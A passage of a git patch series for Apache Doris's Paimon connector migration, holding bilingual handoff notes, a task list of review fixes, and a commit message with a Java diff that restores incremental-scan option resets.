形成后,再与历史结论交叉核对,冲突项作为新 finding 上报。 -5. 输出 **`plan-doc/reviews/P5-paimon-rereview3-.md`**:逐路径 verdict + 确认 finding 表(severity / plugin-site / legacy-site / 证据);若有真分歧 → 走 per-fix 流程(`step-by-step-fix` skill)+ AskUserQuestion 定 scope。 +## ⚠️ 关键结论(修复时参照,**勿当先验压制新发现**) +- 本轮唯一 live BLOCKER = P9-1(**已修**)。**P11-1(DATE-epoch prune)是假 BLOCKER**:paimon 走 + `PluginDrivenMvccExternalTable.getNameToPartitionItems` override(解析 rendered name),不走 base raw-epoch 路 → + D-057 的「prune-路 paimon 残留」框定有误,**B8 时 re-scope 到非-paimon 连接器**(task-list Follow-ups)。 +- 翻闸结构性 OK(R-1…R-8)。legacy `datasource/paimon/*` = dead residue,**B8 删除放最后**(FE-config parity + 期间仍需 legacy `*Properties` 作对照)。 -## 📋 要审阅的功能路径(用户指定,逐条覆盖 + 各自对照 legacy) -1. **基础读取**(normal scan) -2. **批式增量读取**(`@incr` incremental read) -3. **Time Travel**(snapshot / timestamp / `FOR TIME AS OF` / `FOR VERSION AS OF`) -4. **Branch / Tag 读取** -5. **系统表查询**(`tbl$snapshots` 等 sys-tables) -6. **元数据缓存**(schema / table-handle / partition cache) -7. **Deletion Vector 读取**(MoR) -8. **多元数据服务接入**(filesystem / HMS / DLF / REST / JDBC flavor) -9. **多存储系统接入**(s3 / oss / cos / obs / hdfs;凭据下发 + 路径 scheme 规范化) -10. **Parquet / ORC 数据格式读取**(native reader 路 + schema-evolution / field-id) -11. **列类型映射**(read 方向 paimon→doris + write 方向 doris→paimon) -12. **旧逻辑残留 / fallback 排查**:还存在哪些可能**走旧的逻辑**,或**静默 fallback 到旧逻辑**的地方(例:`instanceof PaimonExternalTable`/`PaimonSysTable`/`PaimonSource` 等 cutover 后应 dead 的分支是否真 dead;FE 分发 switch 是否每处都有 `PLUGIN_EXTERNAL_TABLE` 臂;GsonUtils 注册;`getEngine`/`SPI_READY_TYPES` 成员;任何 `instanceof legacy-type` 或 legacy 静态调用仍可达的路径)。 - -## 🗺️ 代码脚手架(「去哪看」,非结论) -- **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/`(+ `fe-connector-paimon-api` / `-backend-{filesystem,hms,aliyun-dlf,rest}`);connector-api `fe/fe-connector/fe-connector-api/`;SPI `fe/fe-connector/fe-connector-spi/`。 -- **fe-core 桥**:`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDriven*.java` + `ConnectorColumnConverter.java`。 -- **Legacy(side-by-side 对照基准,仍在树内)**:`fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/`(`source/PaimonScanNode.java`、`PaimonExternalTable.java`、`PaimonUtil.java`、`PaimonMetadataOps.java`、`metacache/paimon/*` 等)。 -- **BE 消费端**(如需核 thrift 契约):`be/src/vec/exec/format/table/` + `be/src/format/table/`(paimon_reader / partition_column_filler / table_schema_change_helper)。 -- ⚠️ **本轮务必保留 legacy 在树内**(side-by-side 对照基准)→ **B8 legacy 删除推迟到本轮 review 之后**。 +## 🗺️ 代码脚手架 +- **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` + (flavor/存储装配 `PaimonCatalogFactory.java`[FIX-4];scan `PaimonScanPlanProvider.java`+`PaimonScanRange.java`; + @incr `PaimonIncrementalScanParams.java`[FIX-3])。`-api`/`-backend-*` 模块在 git 内为空壳。 +- **fe-core 桥/SPI**:`fe/fe-core/.../connector/DefaultConnectorContext.java`、`.../datasource/PluginDriven*.java`; + SPI `fe/fe-connector/fe-connector-{api,spi}/`。 +- **Legacy 对照基准(仍在树内,勿删)**:`fe/fe-core/.../datasource/paimon/`(`source/PaimonScanNode.java`、 + `PaimonUtil.java`、property `OSSProperties/COSProperties/OBSProperties`、`PaimonRestMetaStoreProperties` 等)。 +- **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`[FILE_FORMAT/MANIFEST_FORMAT backfill :397-411]、 + `paimon_reader.cpp`、`partition_column_filler.h`)。 --- -# 📦 迁移完成态 & 仓库状态 -- **HEAD = 本 docs 提**(更新 HANDOFF 为第三轮 review 任务)。迁移链:…→`67a9b9da6e3`(P3-fix)→`bcee91dcb52`(P4 N10.1)→`4b2c2190dc2`(P4 sentinel)→`af2037cf13b`(P4 docs)→**本 docs 提(HEAD)**。 -- **进度**(完整见 [task-list](./task-list-P5-rereview2-fixes.md)):P0 BLOCKER ✅1·2·3·4|P1 MAJOR ✅5·6·7|P2 perf-parity ✅8·9|P3 覆盖缺口 ✅(3 parity + 1 fix `67a9b9da6e3`)|P4 MINOR/NIT ✅(2 fix `bcee91dcb52`/`4b2c2190dc2` + 15 accept [DV-035])。**无 P0~P4 阻塞剩余。** -- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 -- scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 -- 当前分支 `catalog-spi-07-paimon`(非 `master`)。 -- **legacy `datasource/paimon/*` 仍在树内**——本轮 review 的对照基准,勿删。 +# 📦 仓库状态 +- **HEAD = `2e845e88bf9`(FIX-2)**。迁移链:…→`199485bbde9`(round-3 review 任务)→`c376aba1264`(FIX-1)→**`2e845e88bf9`(FIX-2, HEAD)**。 + 本 session 后另有一个 `docs:` 提(滚 HANDOFF + task-list FIX-1/2 勾掉)。 +- ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** —— commit 前继续 + path-whitelist,**严禁 `git add -A`**;`regression-conf.groovy.bak` 同理排除。 +- 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`);`plan-doc/reviews/P5-paimon-rereview3-2026-06-12.md` + (第三轮 review 报告,未跟踪——大文件,下次方便时 vet+commit 或保留本地)。 +- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**无 P0~P4 阻塞遗留**;P9-1 BLOCKER 已清。 ## ⚠️ Commit 须知(任何 `git add` 前必读) -- **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** -- 若本轮 review 转出 fix:每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 +- **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` + `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** +- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 + `Co-Authored-By: Claude Opus 4.8 (1M context) `。fix commit 带其 design doc(repo 惯例)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false + -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core `-pl :fe-core -am`; + 改 SPI `-pl :fe-connector-api`/`:fe-connector-spi -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon + checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测。连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`/`PaimonTypeMappingReadTest`/`PaimonScanRangePartitionNullTest`。live-e2e CI-gated(S3/OSS/REST/JDBC/Kerberos 外部 fixture,`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测。harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/ + `PaimonScanPlanProviderTest`(real-table `FileSystemCatalog` 取真 DataSplit)/`PaimonIncrementalScanParamsTest`[FIX-3]/ + `PaimonCatalogFactoryTest`[FIX-4]/`DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated + (`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 -## 🧠 给下一个 agent 的 meta(**方法**层,非结论) -- **本轮纪律**:先独立、后核对。每个路径的 verdict 必须**先**从「当前代码 + legacy 对照」得出,**再**(且仅在 reconciliation 阶段)对历史结论。历史与独立判断冲突 → 上报为新 finding,不被历史压制。这是用户对本轮的核心要求。 -- **对抗 review 反复奏效的点**:对抗 verifier 逐分支/逐角度证伪(揪「短路对≠全分支对」「deep-dive 只看单路漏另一路」);completeness critic 抓漏路径与未核 fallback。 -- **此前几轮的产物在哪**(**仅 reconciliation 阶段**参考,find-phase 勿读):`reviews/P5-paimon-rereview2-2026-06-11.md`(第二轮逐路径 + §9 cross-check)、`decisions-log.md`(D-037…D-057)、`deviations-log.md`(DV-001…DV-035)、`task-list-P5-rereview2-fixes.md`、memory `catalog-spi-p5-*`。 +## 🧠 给下一个 agent 的 meta +- **逐项修**:一次一个 fix,design→impl→test→commit,别批量糊。每个 fix 的根因/site/legacy 对照/test 都在 + [task-list-P5-rereview3-fixes.md](./task-list-P5-rereview3-fixes.md) + 各 `FIX-*-design.md`。 +- **design 前对抗 verify 见效**(FIX-1 亲证):5-skeptic 各驳一 claim + completeness critic 在写码前抓出 + signature-fanout(`buildNativeRanges` 连带破 2 额外测试点)+ test-double 矛盾(`RecordingConnectorContext` 必 + override 2-arg)。**改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)。** +- **历史不压制新发现**:P9-1 正是被 DV-025「合理化 defer」却没真修的。 +- 完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`(含 + `catalog-spi-p5-fix1-rest-vended-uri`)。 diff --git a/plan-doc/task-list-P5-rereview3-fixes.md b/plan-doc/task-list-P5-rereview3-fixes.md new file mode 100644 index 00000000000000..31e2ff765eb30e --- /dev/null +++ b/plan-doc/task-list-P5-rereview3-fixes.md @@ -0,0 +1,152 @@ +# Task list — P5 Paimon Round-3 re-review fixes + +> Source: [reviews/P5-paimon-rereview3-2026-06-12.md](./reviews/P5-paimon-rereview3-2026-06-12.md). +> User-approved scope (2026-06-12): **P9-1 fix · P7-1 fix · P2-1 restore-reset · FE-config FULL legacy parity.** +> Execute each via the `step-by-step-fix` skill: design doc → impl → tests → **independent commit**. +> Keep **legacy `datasource/paimon/*` in-tree** as the parity reference until all fixes land (then B8 deletion). + +## Commit hygiene (re-read before any `git add`) +- **Hard pre-req**: scrub `regression-test/conf/regression-conf.groovy` (plaintext Aliyun key) + remove scratch + (`.audit-scratch/`, `conf.cmy/`, `META-INF/`, `*.bak`). **Path-whitelist `git add` — NEVER `git add -A`.** +- Each fix = one commit; message = `fix: ` + root cause + solution + tests, trailing + `Co-Authored-By: Claude Opus 4.8 (1M context) `. + +## Build/verify (reuse) +- maven absolute `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`; verify via surefire XML + `MVN_EXIT` ([[doris-build-verify-gotchas]]). +- fe-core change → `-pl :fe-core -am`; SPI change → `-pl :fe-connector-api`/`:fe-connector-spi -am`. +- checkstyle: connector `mvn -pl :fe-connector-paimon checkstyle:check`; fe-core `mvn -pl :fe-core checkstyle:check`. +- import-gate: `bash tools/check-connector-imports.sh` (connector may import only `org.apache.doris.{thrift,connector,extension,filesystem}`). +- test harness: `RecordingConnectorContext` / `RecordingPaimonCatalogOps` / `FakePaimonTable` / `PaimonScanPlanProviderTest` / `PaimonIncrementalScanParamsTest` / `PaimonCatalogFactoryTest` / `DefaultConnectorContextNormalizeUriTest` (fe-core). live-e2e is CI-gated (`enablePaimonTest=false`) — note as gated, don't claim it ran. + +--- + +## ✅ FIX-1 — `FIX-REST-VENDED-URI-NORMALIZE` (P9-1, **BLOCKER**) — **DONE** (commit `c376aba1264`) +> Design + adversarial red-team (DESIGN-SOUND): `FIX-REST-VENDED-URI-NORMALIZE-design.md`. SPI overload +> `normalizeStorageUri(uri, token)` + fe-core vended-overlay normalize (legacy "vended replaces static") +> + connector threads once-per-scan `extractVendedToken` to both native normalize sites. Verified: +> connector 42/0/0; fe-core NormalizeUri 7/0 (incl. 3 new), Vend 2/0; checkstyle 0; import-gate clean. +> Positive RESTTokenFileIO path E2E-gated. **Next: FIX-2.** +**Symptom**: `SELECT` over a Paimon **REST**-catalog table on **object storage** (oss/cos/obs/s3a), +native reader (ORC/Parquet, default) → FE planning throws `StoragePropertiesException: No storage +properties found for schema: oss`. Worked under legacy. Escape hatch: `force_jni_scanner=true`. + +**Root cause**: native URI normalization uses the **static** catalog storage map, which is **empty by +design for REST** (`CatalogProperty.initStorageProperties:186-192` → `Maps.newHashMap()` when vended +creds enabled). Chain: `PaimonScanPlanProvider.normalizeUri:485-487` → `context.normalizeStorageUri` +→ `DefaultConnectorContext:203` `LocationPath.of(rawUri, staticSupplier.get(), normalize=true)` +(supplier = `PluginDrivenExternalCatalog:157-158`) → empty map → `findStorageProperties`==null → throw. +`shouldUseNativeReader:783` has **no flavor gate**, so REST native reads hit it. Called on the +data-file path (`buildNativeRange:439`) **and** the deletion-vector path (`:448`). + +**Legacy parity ref**: `paimon/source/PaimonScanNode.java:171-176` re-derives a **vended-overlay** map +(`VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials`) and uses it for +`LocationPath.of` at `:443` (data) / `:296` (DV). + +**Fix approach**: route the **vended-overlay** storage map into normalization (legacy parity). The +connector already computes vended creds for the BE overlay (`DefaultConnectorContext.vendStorageCredentials:156-180`, +consumed at `PaimonScanPlanProvider:557-562`) — reuse that map. +- **Design decision (pick in design doc)**: + (a) **[recommended]** add SPI overload `ConnectorContext.normalizeStorageUri(rawUri, Map storageProps)`; + connector passes the vended-merged map it already has at scan time. Explicit, matches legacy. + (b) make the supplier vended-aware (harder — vended creds are per-token/dynamic, supplier is catalog-static). + (c) fallback: when static map lacks the scheme entry, use the vended map. Narrower but implicit. +**Sites**: connector `PaimonScanPlanProvider.normalizeUri` + 2 call sites (`:439`, `:448`); fe-core +`DefaultConnectorContext.normalizeStorageUri:193-204`; SPI `fe-connector-api`/`-spi` if overload added. +**Tests**: `DefaultConnectorContextNormalizeUriTest` — add a **vended-REST** case (static map empty + +vended map carries an oss/s3 entry → normalize succeeds; this is the gap that hid the bug twice); +connector test for `buildNativeRange` data-file **and** DV under a vended context. +**Build**: SPI + fe-core + connector. **Commit**: `fix: FIX-REST-VENDED-URI-NORMALIZE`. +**Reconciliation note**: DV-025 deferred this exact corner to FIX-STATIC-CREDS-BE/FIX-REST-VENDED, but +those fixed cred-downflow, not `normalizeStorageUri`; deferral never closed → still live (report §D.1). + +## ✅ FIX-2 — `FIX-JNI-FILE-FORMAT` (P7-1, MAJOR) — **DONE** (commit `2e845e88bf9`) +> Design: `FIX-JNI-FILE-FORMAT-design.md`. `buildJniScanRange`/`buildCountRange` now emit the real +> `defaultFileFormat` (not `"jni"`); `buildCountRange` gained the param (threaded from call site); +> Builder default `"jni"`→`""`. JNI routing gated by `paimon.split` presence (not the format string), so +> safe. Verified: connector 262/0/1skip (ScanPlanProvider 43/0); checkstyle 0; import-gate clean. +> **Next: FIX-3.** +**Root cause**: `PaimonScanPlanProvider.buildJniScanRange:610` and `buildCountRange:641` hardcode +`.fileFormat("jni")`; the correct `defaultFileFormat` (`= table.options().getOrDefault(FILE_FORMAT,"parquet")`, +computed at `:326-327`) is **passed into the methods and ignored**. `PaimonScanRange:186/244` then emits +`file_format="jni"`. BE `paimon_cpp_reader.cpp:397-411` **backfills** Paimon `FILE_FORMAT`/`MANIFEST_FORMAT` +from this field (guarded "if unset"); the comment says it exists to avoid the `manifest.format=avro` +default → with `"jni"` and an unset `manifest.format` the cpp reader gets an invalid format → manifest +read breaks. +**Legacy parity ref**: `paimon/source/PaimonScanNode.java:259,288` sets the real `"orc"/"parquet"`. +**Fix**: pass the already-available `defaultFileFormat` into `buildJniScanRange`/`buildCountRange` +instead of `"jni"` (and reconsider the `PaimonScanRange.Builder` default `:244`). +**Tests**: `PaimonScanPlanProviderTest` — assert JNI + count ranges carry the real format, not `"jni"`. +**Build**: connector only. No BE change. **Commit**: `fix: FIX-JNI-FILE-FORMAT`. +**Open (non-blocking)**: BE routing — whether a JNI-tagged split ever reaches the cpp reader vs the JNI +reader; fix is correctness-improving regardless. + +## ▶ FIX-3 — `FIX-INCR-SCAN-RESET` (P2-1, MAJOR; was NIT in rereview2) — restore parity +**Root cause**: `PaimonIncrementalScanParams.java:222-265` deliberately strips legacy's defensive +null-reset (`PAIMON_SCAN_SNAPSHOT_ID=null`, `PAIMON_SCAN_MODE=null`). On a table that **persists** +`scan.*` options, the freshly-loaded base table inherits them and they're not reset before the +incremental-between window is applied → potential wrong @incr scan. +**Legacy parity ref**: `paimon/source/PaimonScanNode.java:840-846` seeds both nulls (re-asserts +`scan.mode=null` in the snapshot branch), applied via `baseTable.copy(getIncrReadParams())` `:896`. +**Fix**: re-add the null-reset of `scan.snapshot-id` + `scan.mode` before `table.copy(scanOptions)`. +- **Design decision**: the connector's `ConnectorMvccSnapshot.Builder.property()` **rejects null values** + (why the keys were stripped originally). So thread the reset directly into the `table.copy(...)` map at + `PaimonScanPlanProvider.resolveScanTable` (which can hold key→null), OR allow null specifically on the + incremental options path. Decide in the design doc. +**Sites**: `PaimonIncrementalScanParams.java:222-265`; `PaimonConnectorMetadata.applySnapshot` / +`PaimonScanPlanProvider.resolveScanTable` (where `table.copy(scanOptions)` runs). +**Tests**: `PaimonIncrementalScanParamsTest` — assert the reset keys are present/applied for @incr. +**Build**: connector only. **Commit**: `fix: FIX-INCR-SCAN-RESET`. + +## ▶ FIX-4 — `FIX-FECONF-STORAGE-PARITY` (cluster: P8-1/P8-2/P8-3/P8-4/P9-2/P9-3) — FULL legacy parity +**Root cause (shared)**: `PaimonCatalogFactory.buildHadoopConfiguration:390-394` rebuilds the FE-side +Hadoop `Configuration` from RAW props (the connector cannot import fe-core `OSSProperties`/`COSProperties`/ +`OBSProperties`/`HMSBaseProperties`), and the reconstruction (`applyStorageConfig:412-426`, +`applyCanonicalS3Config:437-465`, `applyCanonicalOssConfig:475-499`, alias arrays `:87-106`) is +**incomplete** vs legacy. Affects filesystem/jdbc/HMS flavors → catalog/metadata access fails on the +missing backends. Constraint: replicate legacy key logic with **literals** (same pattern as existing +`applyCanonical*`), no fe-core import. +**Recommended split (clean independent commits)**: +- **4a `FIX-FECONF-OSS`** (P8-1, P8-3): emit `fs.oss.endpoint` derived from region when endpoint blank + (replicate legacy `OSSProperties.getOssEndpoint` → `oss-[-internal].aliyuncs.com`, + ref `:277-279,314-326`); also emit the S3A keys for OSS that legacy emitted (`fs.s3.impl`/`fs.s3a.*`). +- **4b `FIX-FECONF-S3`** (P8-2, P9-3): emit `fs.s3a.path.style.access` from `use_path_style`/ + `s3.path-style-access` + connection/timeout keys (MinIO/path-style). +- **4c `FIX-FECONF-COS-OBS`** (P9-2): add `cos.*`/`obs.*` alias arrays + emit COS keys + (`fs.cosn.impl`, `fs.cosn.userinfo.secretId/secretKey`, `fs.cosn.bucket.region`; ref `COSProperties:174-182`) + and OBS keys (`fs.obs.impl`, `fs.AbstractFileSystem.obs.impl`, `fs.obs.access.key/secret.key`; ref `OBSProperties:194-204`). +- **4d `FIX-FECONF-HMS-USER`** (P8-4): emit `hive.metastore.username` alias for `hadoop.username` in `buildHmsHiveConf`. +**Tests**: `PaimonCatalogFactoryTest` — one case per backend (region-only OSS → `fs.oss.endpoint`; +COS props → `fs.cosn.*`; OBS → `fs.obs.*`; S3 path-style; HMS username alias). +**Build**: connector only (`PaimonCatalogFactory` is pure connector). **Commits**: 4a–4d (or one +`fix: FIX-FECONF-STORAGE-PARITY` if you prefer a single commit). + +--- + +## Suggested order & dependencies +No hard deps. Suggested: **FIX-1 (BLOCKER)** → FIX-2 → FIX-3 → FIX-4a…4d. +FIX-1 & FIX-2 both edit `PaimonScanPlanProvider` (sequence to avoid churn). FIX-3 edits +`PaimonIncrementalScanParams`/scan-table copy. FIX-4 edits only `PaimonCatalogFactory` (independent). + +## NOT in this fix scope — proposed deviations (confirm before B8 / final cleanup) +Accepted-as-deviation candidates (report §F/§G), pending explicit user sign-off: +- **MINOR**: P1-2 (split weight), P1-3 (EXPLAIN diag), P1-4 (CHAR LIKE pushdown), P1-5 (CAST conjunct drop), + P1-6 (count→1 range), P4-1 (branch schema source), P5-1 (WITH_TIMEZONE extra-info), P6-1 (latest-schema + cache key drops schema-id), P11-3 (nested struct comments on write), P12-1 (inert table-cache props). +- **NIT**: P3-2/P3-3 (error text), P4-3/P4-4 (branch non-FileStoreTable), P5-2 (sys-table live handle), + P7-2 (native sub-split weight), P7-3 (VERBOSE delete-file counts), P10-1 (`.parq`→JNI), + P10-2 (force-jni omits -1 entry), P12-2/P12-3 (dead residue), C-3 (MTMV sentinel filter). +- **C-1 (MINOR observability)** — scan-planning metrics + summary-profile timers dropped for every paimon + query. Decide: restore (re-wire metric registry + profile timers in the plugin scan path) or accept. +- **uncheckedFallbacks** (need live confirmation): REFRESH TABLE/CATALOG → connector cache invalidation + (no `invalidateTable` SPI; possible stale MVCC snapshot/handle); partitions-TVF auth + LATEST-only + resolution; split-plan RPC outside `executeAuthenticated` (Kerberos); `PluginDrivenExternalCatalog:140` + swallows authenticator-wiring exceptions. + +## Follow-ups (after fixes) +- **D-057 re-scope** (report §D.3): the deferred `TablePartitionValues:162` prune-path sentinel residue + does **not** affect paimon (MVCC override bypasses it). Re-scope the deferral to non-MVCC plugin + connectors (maxcompute/es/jdbc); the base-class DATE-epoch + HIVE_DEFAULT paths (P11-1/P11-2) are a + latent concern there, not paimon. +- **B8 legacy deletion**: R-1…R-7 enumerate the dead subtree. Deletion must preserve load-bearing + dispatch ordering (`ShowPartitionsCommand:478-480`, R-4) and may proceed once the FE-config-parity + fixes no longer need legacy `*Properties` as a reference. From 3e382210415d2ff9bbc086387c4538ec4fc423f1 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 19:02:07 +0800 Subject: [PATCH 040/128] =?UTF-8?q?fix:=20FIX-INCR-SCAN-RESET=20=E2=80=94?= =?UTF-8?q?=20@incr=20drops=20legacy=20scan.snapshot-id/scan.mode=20reset?= =?UTF-8?q?=20(P2-1,=20MAJOR)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PaimonIncrementalScanParams.validate stripped legacy's defensive null reset of scan.snapshot-id/scan.mode (PaimonScanNode:842-846), justified by a wrong "a fresh per-query Table can't inherit scan.*" rationale. A base table that PERSISTS scan.snapshot-id/scan.mode (legal & mutable via ALTER TABLE SET / TBLPROPERTIES / table-default.*) carries it on every fresh load. Without the reset, resolveScanTable's Table.copy merges the stale scan.snapshot-id with incremental-between and paimon 1.3.1 either THROWS ("[incremental-between] must be null when you set [scan.snapshot-id, scan.tag-name]") or silently downgrades the @incr read to FROM_SNAPSHOT at the stale id (wrong rows). The connector dropped exactly the safeguard legacy relied on. Solution (Option 2; design red-team wf_ffd11631-ed2, DESIGN-SOUND): keep validate() emitting only the non-null incremental-between* keys so the shared ConnectorMvccSnapshot SPI / handle stay null-free, and reapply the two null resets at the single Table.copy chokepoint via new PaimonIncrementalScanParams.applyResetsIfIncremental(scanOptions), called in PaimonScanPlanProvider.resolveScanTable. paimon copyInternal consumes a null value as options.remove(k), clearing the stale pin. The one edit covers BOTH callers (native/JNI scan planScanInternal + JNI serialized-table getScanNodeProperties). Gated on incremental-between / incremental-between-timestamp presence, so a genuine scan.snapshot-id / scan.tag-name pin passes through unchanged (no false positive). Strict legacy parity: resets scan.snapshot-id + scan.mode only. Corrected the now-refuted "byte-parity on a freshly-loaded base" rationale in the affected javadoc/comments. Tests: PaimonIncrementalScanParamsTest +4 (helper seeds the null resets for snapshot and timestamp windows; passes non-incremental pins through unchanged; no-op for empty/null) and reworded the keep-null-free validate() test; PaimonScanPlanProviderTest +1 real-table (FileSystemCatalog over a persisted scan.snapshot-id), proven fail-before (paimon throws) / pass-after; PaimonConnectorMetadataMvccTest WHY-comment reworded (assertions unchanged). Connector suites 20/44/37 green; checkstyle 0; import-gate clean. Connector-only — no SPI, no BE change. Live @incr-over-persisted-scan.snapshot-id E2E is CI-gated (enablePaimonTest =false), noted as gated. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonConnectorMetadata.java | 7 +- .../paimon/PaimonIncrementalScanParams.java | 91 +++++++-- .../paimon/PaimonScanPlanProvider.java | 6 +- .../PaimonConnectorMetadataMvccTest.java | 15 +- .../PaimonIncrementalScanParamsTest.java | 91 +++++++-- .../paimon/PaimonScanPlanProviderTest.java | 49 +++++ plan-doc/FIX-INCR-SCAN-RESET-design.md | 179 ++++++++++++++++++ 7 files changed, 398 insertions(+), 40 deletions(-) create mode 100644 plan-doc/FIX-INCR-SCAN-RESET-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 012bddf0a98416..ba203b9f8bd6fe 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -488,8 +488,11 @@ public Optional resolveTimeTravel( // Validate the raw @incr window params and produce the paimon scan options. This is // the ~180-line legacy validation, ported byte-faithfully into the connector // (PaimonIncrementalScanParams). The produced opts hold incremental-between* keys ONLY - // (the legacy null-valued scan.snapshot-id/scan.mode resets are stripped — see that - // class's javadoc for why that's byte-parity on a freshly-loaded base table). + // — the snapshot/handle stay null-free (shared SPI contract). The legacy null-valued + // scan.snapshot-id/scan.mode resets are NOT carried here; they are reapplied at the + // Table.copy chokepoint via PaimonIncrementalScanParams.applyResetsIfIncremental + // (FIX-INCR-SCAN-RESET), so a base table that persists a stale scan.snapshot-id cannot + // hijack incremental-between. Map opts = PaimonIncrementalScanParams.validate(spec.getIncrementalParams()); // Legacy @incr reads at the LATEST snapshot and applies incremental-between at scan time: // PaimonExternalTable.getPaimonSnapshotCacheValue falls through (neither tag/branch nor diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java index 8aa9a747610839..9c00327d8114a1 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java @@ -36,17 +36,23 @@ * message string is reproduced for parity, EXCEPT the legacy {@code UserException} (fe-core type) * is replaced by {@link DorisConnectorException} (the connector cannot import fe-core). * - *

      BENIGN DIVERGENCE (documented): legacy seeds the result map with - * {@code paimonScanParams.put(PAIMON_SCAN_SNAPSHOT_ID, null)} and - * {@code put(PAIMON_SCAN_MODE, null)} (lines 842-843) as defensive RESETS — it copies these - * nulls onto a base {@code Table} that may have inherited {@code scan.snapshot-id}/{@code scan.mode} - * from a prior pin. Here the connector resolves a FRESH {@code Table} per query (no inherited - * scan.snapshot-id/scan.mode), so the resets are a no-op in EFFECT. Moreover - * {@code ConnectorMvccSnapshot.Builder.property(...)} rejects null values - * ({@code Objects.requireNonNull}). So this port emits ONLY the non-null keys - * ({@code incremental-between} / {@code incremental-between-timestamp} / - * {@code incremental-between-scan-mode}); stripping the null resets is byte-parity in EFFECT on a - * freshly-loaded base table. + *

      NULL RESETS — WHERE THEY LIVE (FIX-INCR-SCAN-RESET): legacy seeds the result map with + * {@code put(PAIMON_SCAN_SNAPSHOT_ID, null)} and {@code put(PAIMON_SCAN_MODE, null)} (lines 842-843, + * re-asserted 846) as defensive RESETS, then applies them via {@code baseTable.copy(...)}. Those + * resets ARE required: a freshly-loaded base table's {@code tableSchema.options()} can PERSIST a + * stale {@code scan.snapshot-id}/{@code scan.mode} (legal & mutable via {@code ALTER TABLE SET}, + * {@code TBLPROPERTIES}, {@code table-default.*}); without the reset, {@code Table.copy} merges the + * stale {@code scan.snapshot-id} with {@code incremental-between} and paimon 1.3.1 either THROWS + * ({@code "[incremental-between] must be null when you set [scan.snapshot-id,scan.tag-name]"}) or + * silently resolves to {@code FROM_SNAPSHOT} at the stale id (wrong @incr rows). However, the null + * values must NOT enter the SHARED, source-agnostic {@link + * org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot} SPI type (its {@code Builder.property} + * rejects null and its {@code getProperties()} is documented "never null"). So {@link #validate} + * emits ONLY the non-null {@code 